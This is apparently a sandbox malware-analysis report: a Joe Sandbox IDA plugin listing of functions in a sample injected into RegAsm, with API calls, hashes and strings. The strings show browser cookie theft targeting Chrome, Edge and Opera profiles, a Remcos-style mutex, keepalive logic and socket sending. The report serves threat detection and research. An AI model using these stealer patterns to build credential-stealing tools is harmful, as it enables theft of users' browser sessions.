                                                                                                                            control_flow_graph 1641 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1652 41b35d-41b366 1641->1652 1653 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1641->1653 1654 41b368-41b36d 1652->1654 1655 41b36f 1652->1655 1663 41b355-41b358 call 401fd8 1653->1663 1664 41b349-41b352 call 41cf69 1653->1664 1657 41b374-41b37f call 40537d 1654->1657 1655->1657 1663->1652 1664->1663
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                              • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                                                              • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                              • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                                                                              • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                                                                            • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                            • API String ID: 782494840-2070987746
                                                                                                                            • Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                                                                            • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                                                                            • Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                                                                            • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                            • __freea.LIBCMT ref: 10008A08
                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                            • __freea.LIBCMT ref: 10008A11
                                                                                                                            • __freea.LIBCMT ref: 10008A36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1414292761-0
                                                                                                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CountEventTick
                                                                                                                            • String ID: !D@$NG
                                                                                                                            • API String ID: 180926312-2721294649
                                                                                                                            • Opcode ID: ea56fac7d1c0944bc57ebfd3d31ac22628d7682721ddb05d0c6019dbcd1cd3f3
                                                                                                                            • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                                                                            • Opcode Fuzzy Hash: ea56fac7d1c0944bc57ebfd3d31ac22628d7682721ddb05d0c6019dbcd1cd3f3
                                                                                                                            • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                                                                                                            Strings
                                                                                                                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                                                                            • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                            • API String ID: 1174141254-1980882731
                                                                                                                            • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                                                                            • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                                                                            • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                                                                            • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                                                                                                            Strings
                                                                                                                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                                                                            • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                            • API String ID: 1174141254-1980882731
                                                                                                                            • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                                                                            • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                                                                            • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                                                                            • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                            Strings
                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                                            • Opcode ID: f26594ba8ec3a82e1af01c42dab2d510cffb8817789c9245bc2ee9d3b928716d
                                                                                                                            • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                                                                            • Opcode Fuzzy Hash: f26594ba8ec3a82e1af01c42dab2d510cffb8817789c9245bc2ee9d3b928716d
                                                                                                                            • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                                                                            • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValue
                                                                                                                            • String ID: pth_unenc
                                                                                                                            • API String ID: 1818849710-4028850238
                                                                                                                            • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                            • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                                                                            • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                            • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                                                                            APIs
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3360349984-0
                                                                                                                            • Opcode ID: f9d5220b46ff8e20b781fb9760721100cc9265fad88895d0f7bb8892bc5cd132
                                                                                                                            • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                                                                            • Opcode Fuzzy Hash: f9d5220b46ff8e20b781fb9760721100cc9265fad88895d0f7bb8892bc5cd132
                                                                                                                            • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModuleProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2905821283-0
                                                                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3177248105-0
                                                                                                                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                                                                            • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3177248105-0
                                                                                                                            • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                                            • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                                                                            • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                                            • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3919263394-0
                                                                                                                            • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                                                                            • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                                                                            • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                                                                            • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                                                                            APIs
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                            • API String ID: 1174141254-4188645398
                                                                                                                            • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                                                                            • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                                                                            • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                                                                            • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                                                                            APIs
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                            • API String ID: 1174141254-2800177040
                                                                                                                            • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                                                                            • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                                                                            • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                                                                            • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                                                                            APIs
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                            • API String ID: 1174141254-1629609700
                                                                                                                            • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                                                                            • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                                                                            • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                                                                            • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                                                                            • GetLastError.KERNEL32 ref: 0040D083
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                            • String ID: Rmc-43JG4A
                                                                                                                            • API String ID: 1925916568-1101955572
                                                                                                                            • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                                                                            • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                                                                            • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                                                                            • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                              • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModuleProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2905821283-0
                                                                                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                            • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                            • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                            APIs
                                                                                                                            • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
